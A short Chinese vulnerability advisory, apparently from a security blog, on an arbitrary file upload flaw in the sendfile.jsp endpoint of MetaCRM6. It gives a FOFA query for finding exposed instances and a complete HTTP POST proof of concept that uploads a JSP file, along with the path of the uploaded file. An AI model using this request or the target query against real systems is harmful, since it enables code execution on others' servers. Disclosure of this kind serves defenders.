释放双眼,带上耳机,听听看~!
一、漏洞简介
美特CRM 客户关系管理系统是一个综合的、全面的、以客户为中心的企业管理套件。MetaCRM6是全新一 代的CRM智能平台,完全超越了传统CRM的功能范围和设计理念,以客户的需求为优先,是一个智能主动随需应变的超级CRM平台。美特CRM客户关系管理系统 sendfile 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
二、影响版本
美特CRM 客户关系管理系统
三、资产测绘
fofaproduct="美特软件-MetaCRM6"
特征
四、漏洞复现
POST /business/common/importdata/sendfile.jsp HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpW22
------WebKitFormBoundary03rNBzFMIytvpW22
Content-Disposition: form-data; name="file"; filename="1.jsp"
<%out.print(111 * 111);%>
------WebKitFormBoundary03rNBzFMIytvpW22--/userfile/default/temp/4028808197ce26fb0197da916d502f5a.jsp
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
